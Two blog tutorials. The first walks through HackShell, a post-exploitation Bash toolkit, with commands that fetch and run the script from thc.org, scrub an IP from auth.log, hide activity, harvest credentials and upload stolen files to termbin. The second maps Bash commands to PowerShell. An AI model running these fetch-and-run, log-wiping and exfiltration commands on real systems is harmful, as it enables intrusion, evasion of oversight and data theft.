Welcome back, aspiring cyberwarriors!

In one of our Linux Forensics articles we discussed how widespread Linux systems are today. Most of the internet quietly runs on Linux. Internet service providers rely on Linux for deep packet inspection. Websites are hosted on Linux servers. The majority of home and business routers use Linux-based firmware. Even when we think we are dealing with simple consumer hardware, there is often a modified Linux kernel working in the background. Many successful web attacks end with a Linux compromise rather than a Windows one. Once a Linux server is compromised, the internal network is exposed from the inside. Critical infrastructure systems also depend heavily on Linux. Gas stations, industrial control systems, and even CCTV cameras often run Linux or Linux-based embedded firmware.

Master OTW has an excellent series showing how cameras can be exploited and later used as proxies. Once an attacker controls such a device, it becomes a doorway into the organization. Cameras are typically reachable from almost everywhere in the segmented network so that staff can view them. When the camera is running cheap and vulnerable software, that convenience can turn into a backdoor that exposes the entire company. In many of our forensic investigations we have seen Linux-based devices like cameras, routers, and small appliances used as the first foothold. After gaining root access, attackers often deploy their favorite tools to enumerate the environment, collect configuration files, harvest credentials, and sometimes even modify PAM to maintain silent persistence.

So Bash is already a powerful friend to both administrators and attackers. But we can make it even more stealthy and hacker friendly. We are going to explore HackShell, a tool designed to upgrade your Bash environment when you are performing penetration testing. HackShell was developed by The Hacker’s Choice, a long-standing hacking research group known for producing creative security tools. The tool is actively maintained, loads entirely into memory, and does not need to write itself to disk. That helps reduce forensic artifacts and lowers the chance of triggering simple detections.

If you are a defender, this article will also be valuable. Understanding how tools like HackShell operate will help you recognize the techniques attackers use to stay low-noise and stealthy. Network traffic and behavioral traces produced by these tools can become intelligence signals that support your SIEM and threat detection programs.

Let’s get started.

Setting Up

Once a shell session has been established, HackShell can be loaded directly into memory by running either of the following commands:

bash$ > source <(curl -SsfL https://thc.org/hs)

Or this one:

bash$ > eval "$(curl -SsfL https://github.com/hackerschoice/hackshell/raw/main/hackshell.sh)"

You are all set. Once HackShell loads, it performs some light enumeration to collect details about the current environment. For example, you may see output identifying suspicious cron jobs or even detecting tools such as gs-netcat running as persistence. That early context already gives you a sense of what is happening on the host.

But if the compromised host does not have internet access, for example when it sits inside an air-gapped environment, you can manually copy and paste the contents of the HackShell script after moving to /dev/shm. On very old machines, or when you face compatibility issues, you may need to follow this sequence instead.

First run:

bash$ > bash -c 'source <(curl -SsfL https://thc.org/hs); exec bash'

And then follow it with:

bash$ > source <(curl -SsfL https://thc.org/hs)

Now we are ready to explore its capabilities.

Capabilities

The developers of HackShell clearly put a lot of thought into what a penetration tester might need during live operations. Many helpful functions are built directly into the shell. You can list these features using the xhelp command, and you can also request help on individual commands using xhelp followed by the command name.

We will walk through some of the most interesting ones. A key design principle you will notice is stealth. Many execution methods are chosen to minimize traces and reduce the amount of forensic evidence left behind.

Evasion

These commands will help you reduce your forensic artefacts. 

xhome

This command temporarily sets your home directory to a randomized path under /dev/shm. This change affects only your current HackShell session and does not modify the environment for other users who log in. Placing files in /dev/shm is popular among attackers because /dev/shm is a memory-backed filesystem. That means its contents do not persist across reboots and often receive less attention from casual defenders.

bash$ > xhome

For defenders reading this, it is wise to routinely review /dev/shm for suspicious files or scripts. Unexpected executable content here is frequently a red flag.

xlog

When attackers connect over SSH, their login events typically appear in system authentication logs. On many Linux distributions, these are stored in auth.log. HackShell includes a helper to selectively remove traces from the log.

For example:

bash$ > xlog '1.2.3.4' /var/log/auth.log

xtmux

Tmux is normally used by administrators and power users to manage multiple terminal windows, keep sessions running after disconnects, and perform long-running tasks. Attackers abuse the same features. In several forensic cases we observed attackers wiping storage by launching destructive dd commands inside tmux sessions so that data erasure would continue even if the network dropped or they disconnected.

This command launches an invisible tmux session:

bash$ > xtmux

Enumeration and Privilege Escalation

Once you have shifted your home directory and addressed logs, you can begin to understand the system more deeply.

ws

The WhatServer command produces a detailed overview of the environment. It lists storage, active processes, logged-in users, open sockets, listening ports, and more. This gives you a situational awareness snapshot and helps you decide whether the machine is strategically valuable.

lpe

LinPEAS is a well-known privilege escalation auditing script. It is actively maintained, frequently updated, and widely trusted by penetration testers. HackShell integrates a command that runs LinPEAS directly in memory so the script does not need to be stored on disk.

bash$ > lpe

The script will highlight possible paths to privilege escalation. In the example environment we were already root, which meant the output was extremely rich. However, HackShell works well under any user account, making it useful at every stage of engagement.

hgrep

Credential hunting often involves searching through large numbers of configuration files or text logs. The hgrep command helps you search for keywords in a simple and direct way.

bash$ > hgrep pass

This can speed up the discovery of passwords, tokens, keys, or sensitive references buried in files.

scan

Network awareness is critical during lateral movement. HackShell’s scan command provides straightforward scanning with greppable output. You can use it to check for services such as SMB, SSH, WMI, WINRM, and many others.

You can also search for the ports commonly associated with domain controllers, such as LDAP, Kerberos, and DNS, to identify Active Directory infrastructure. Once domain credentials are obtained, they can be used for enumeration and further testing. HTTP scanning is also useful for detecting vulnerable web services.

Example syntax:

bash$ > scan PORT IP

loot

For many testers, this may become the favorite command. loot searches through configuration files and known locations in an effort to extract stored credentials or sensitive data. It does not always find everything, especially when environments use custom paths or formats, but it is often a powerful starting point.

bash$ > loot

If the first pass does not satisfy you:

bash$ > lootmore

When results are incomplete, combining loot with hgrep can help you manually hunt for promising strings and secrets.

Lateral Movement and Data Exfiltration

When credentials are discovered, the next step may involve testing access to other machines or collecting documents. It is important to emphasize legal responsibility here. Mishandling exfiltrated data can expose highly sensitive information to the internet, violating agreements.

tb

The tb command uploads content to termbin.com. Files uploaded this way become publicly accessible if someone guesses or brute forces the URL. This must be used with caution. 

bash$ > tb secrets.txt

After you extract data, securely deleting the local copy is recommended.

bash$ > shred secrets.txt

xssh and xscp

These commands mirror the familiar SSH and SCP tools and are used for remote connections and secure copying. HackShell attempts to perform these actions in a way that minimizes exposure. Defenders are continuously improving monitoring, sometimes sending automatic alerts when new SSH sessions appear. If attackers move carelessly, they risk burning their foothold and triggering incident response. 

Connect to another host:

bash$ > xshh root@IP

Upload a file to /tmp on the remote machine:

bash$ > xscp file root@IP:/tmp

Download a file from the remote machine to /tmp:

bash$ > xscp root@IP:/root/secrets.txt /tmp

Summary

HackShell is an example of how Bash can be transformed into a stealthy, feature-rich environment for penetration testing. There is still much more inside the tool waiting to be explored. If you are a defender, take time to study its code, understand how it loads, and identify the servers it contacts. These behaviors can be turned into Indicators of Compromise and fed into your SIEM to strengthen detection.

If ethical hacking and cyber operations excite you, you may enjoy our Cyberwarrior Path. This is a three-year training journey built around a two-tier education model. During the first eighteen months you progress through a rich library of beginner and intermediate courses that develop your skills step by step. Once those payments are complete, you unlock Subscriber Pro-level training that opens the door to advanced and specialized topics designed for our most dedicated learners. This structure was created because students asked for flexibility, and we listened. It allows you to keep growing and improving without carrying an unnecessary financial burden, while becoming the professional you want to be.

The post Linux: HackShell – Bash For Hackers first appeared on Hackers Arise.

Welcome back, hackers!

When moving from Bash to PowerShell, people often run into difficulties simply because they do not know which tools in PowerShell serve as equivalents and how to use them. For example, I personally like Bash for its straightforward logic. If you need to grab only certain lines from a text file, you know you can call on cat and grep. But when you try to type something similar in PowerShell, it often feels like hitting a wall. You know the logic, you know it should be just a one-liner, yet you get stuck on how to actually do it. That is exactly what we are going to sort out today. 

This article serves as an addition to PowerShell for Hackers: Basics and aims to show more of PowerShell’s capabilities by mapping familiar Bash commands to their PowerShell equivalents. If you haven’t read PowerShell for Hackers: Basics, we highly recommend starting there. This guide is written for people who know the Linux command line and want practical examples for their workflows in PowerShell.

General Rules of the Game

Let’s start with the most basic thing, which is still very important, it is working with variables. In Bash, declaring a variable is as simple as writing foo=1. In PowerShell, you need to add a dollar sign: $foo=1. To print the value of a variable to the screen, you can use the universal echo or the PowerShell-specific cmdlet Write-Host. Is it longer? Definitely. But the benefit is that with Write-Host you can control the output in interesting ways:

PS > Write-Host (2,4,6,8,10,12) -Separator "->" -ForegroundColor DarkMagenta -BackgroundColor White

This snippet will print the sequence of numbers inside the parentheses, place a -> between them, and also change both the text and the background colors. For a quick throwaway script this isn’t necessary, but for a daily report it might be quite useful.

If you need to compare something PowerShell has a full set of operators, familiar to anyone coming from Linux.

If comparison operators and logical conditions are more or less clear, let’s look at a very simple but practical example with data types. Suppose we want to measure the average response time from a website like google.com. To do this we need to send several pings and calculate the average. Here’s a short script:

Write-Host `n "Waiting for test ..."
$Avg = 0
$Site = "www.google.com"
$PingSite = Test-Connection -Count 5 $Site
$Avg = ($PingSite | Measure-Object ResponseTime -Average)
$Calc = ($Avg.Average) -as [int]
Clear-Host
Write-Host "Average response time to $Site is $Calc ms"

If we don’t cast the value to an integer, we get a floating-point number, which isn’t very convenient for this purpose.
This is one of the instances where a PowerShell command is actually stronger than the classic Linux ping. The Test-Connection cmdlet outputs structured objects that already contain response times, status, and other useful properties. That means you can pipe the results directly into tools like Measure-Object and do math on them without needing to parse text with awk or grep. In Linux, ping is text-based, so you often need extra commands to extract the numbers. PowerShell skips that step

Aliases

To make PowerShell easier to use, you can create aliases. It’s worth checking the aliases already available on your system with:

PS > Get-Alias

Aliases can even point to programs. For example, let’s make an alias for launching the calculator:

PS > Set-Alias -Name calc -Value calc.exe

Now typing calc will start the calculator. If you want your alias to represent a command with parameters, you need to wrap it in a function:

function AL01 { Test-Connection -Count 2 google.com }
Set-Alias ping AL01

Now when you type ping, it will perform two pings to google.com. To remove an alias, use:

PS > Remove-Item alias:ping

Note, once you close PowerShell, all aliases you created this way disappear. To keep them permanently, you need to save them in your profile. PowerShell actually has four possible profiles. You can see them with:

PS > $profile | Format-List -Force

To check if they exist on your system:

PS > $profile | Format-List -Force | ForEach-Object { Test-Path $_ }

If the result is False, the file simply doesn’t exist. You can create it, for example, at this path:

PS > notepad.exe C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1

And add your aliases inside it:

function AL01 { Test-Connection -Count 2 google.com }
Set-Alias ping AL01

After saving and restarting PowerShell, your aliases will load automatically.

One important note. By default, Windows blocks the execution of external scripts. This means your profile file might be ignored. To check the current policy, run:

PS > Get-ExecutionPolicy

Most likely it will return Restricted, which means all scripts are blocked. To allow your profile script to run, you need to open PowerShell as Administrator and set:

PS > Set-ExecutionPolicy Unrestricted

After confirmation, scripts will run normally, including your profile file.

Going Deeper

Now let’s move on to the most popular Linux tools and their PowerShell equivalents, from simple to more advanced.

cd

Navigation between directories. You can use the familiar cd alias or the cmdlet Set-Location:

PS > Set-Location Windows

This moves you to the Windows folder in the current directory. PowerShell even lets you navigate the registry the same way:

PS > Set-Location -Path "HKLM:"

PS > Set-Location -Path "HKEY_LOCAL_MACHINE\SYSTEM\Software\Microsoft\CTF"

ls

To view the contents of a directory, use ls, dir, or the cmdlet Get-ChildItem:

PS > Get-ChildItem C:\

This shows everything on the C: drive. To sort results by modification time (like ls -ltr in Linux):

PS > Get-ChildItem $env:USERPROFILE\Documents | Sort-Object -Property LastWriteTime

For recursive searches:

PS > Get-ChildItem -Path C:\ -Force -Recurse

mkdir

To create directories, use New-Item:

PS > New-Item -ItemType Directory -Name intel

Or to create a subfolder:

PS > New-Item -ItemType "directory" -Path "c:\intel\papers"

You can even create a text file with content in one command:

PS > New-Item -Path . -Name "key.txt" -ItemType "file" -Value "HSDAF8KL"

touch

Creating files also uses New-Item:

PS > New-Item -ItemType "file" -Path "c:\temp\file.txt", "C:\intel\papers\classified.txt"

This makes two files in different folders.

cp

Copying files is done with Copy-Item:

PS > Copy-Item -Path C:\intel\classified.txt -Destination C:\important\

It also works over the network:

PS > Copy-Item -Path C:\key.txt -Destination '\\file-srv\f$\key.txt'

rm

Deleting files is Remove-Item. The dangerous rm -rf equivalent is:

PS > Remove-Item -Recurse -Force

Like in Linux, it’s one of the most dangerous commands. A single mistake can wipe entire directories. It’s a good practice to first preview what will be deleted with Get-ChildItem, or even rename files instead of deleting them to make recovery easier.

You can also delete by masks:

PS > Remove-Item *.txt

Or specific files:

PS > Remove-Item C:\dir1\records, C:\dir1\photos, C:\dir2\interrogations

find

To search for files, use Get-ChildItem with filters. For example:

PS > Get-ChildItem C:\ -Include *.exe -Recurse

This found all .exe files on C:\ but you can also limit depth:

PS > Get-ChildItem -Path "C:\Files\*.exe" -Filter "*software*" -Depth 2 -Exclude "*server*" -Recurse

Notice how flexible the filtering is. Often you don’t need regular expressions.

cat

To read files use Get-Content or gc:

PS > Get-Content -Path C:\case\script.txt

tail

To see the last ten lines of a file:

PS > Get-Content c:\logs\log.txt -TotalCount 10

To monitor in real time:

PS > Get-Content "C:\logs\log.txt" -Wait | Where { $_ -Match "Error" }

This shows new lines containing “Error” as they appear.

grep

PowerShell doesn’t have a perfect grep equivalent, but there are alternatives. To filter objects, use Where-Object.

List processes using more than 100 MB of memory:

PS > Get-Process | Where-Object { $_.WorkingSet -gt 104857600 }

For text searches, use Select-String to find the string that mentions your keyword:

PS > Select-String -Path C:\logs\*.log -Pattern "error"

Or combine with Get-Content:

PS > Get-Content -Path C:\scripts\script.txt | Select-String -Pattern "alias"

uname

To display system information:

PS > $Properties = 'Caption', 'CSName', 'Version', 'BuildType', 'OSArchitecture'; Get-CimInstance Win32_OperatingSystem | Select-Object $Properties | Format-Table -AutoSize

Longer than uname -a, but you can alias it if needed. At the end of the day, you don’t really use it much.

mkfs

To create filesystems, PowerShell has New-Volume and Format-Volume:

PS > New-Volume -StoragePoolName "CompanyData" -FriendlyName "TestVolume" -Size 10GB -ResiliencySettingName "Mirror" -FileSystem NTFS -AccessPath "M:" -ProvisioningType Fixed

Be careful, as misuse can destroy your data. Always test on a safe machine first.

ping

The classic ping equivalent is Test-Connection:

PS > Test-Connection google.com

cut

To extract only certain fields, use Select-Object. For example, to list text files in your user folder but only show names and sizes:

PS > Get-ChildItem $env:USERPROFILE -Filter "*.txt" | Select-Object -Property 'Name', 'Length'

man

The man equivalent is Get-Help:

PS > Get-Help Get-ChildItem

You can also use wildcards:

PS > Get-Help Get-*

Conclusion

As you can see, almost every Linux command has a worthy PowerShell counterpart. Some of them are less elegant or more verbose, but in return they often give you more power through structured objects and richer filtering. Bash and PowerShell approach the same problems from different angles. Bash is all about short, sharp one-liners, a language of quick hacks and piping small tools together. PowerShell takes more words to get going, but it pays you back with depth. Its cmdlets work with objects instead of plain text, which means more precision and flexibility. A job that takes three or four utilities strung together in Bash can sometimes be handled by a single cmdlet.

The transition isn’t painless. The syntax can feel verbose and the patterns unfamiliar. It looks like you’re doing more typing for the same result. In the end, it all comes down to habit and practice. PowerShell is essentially a full toolbox, while Bash is a handy pocket knife. The more you experiment and analyze, the more natural it will feel.

The post PowerShell: Moving from Bash to PowerShell first appeared on Hackers Arise.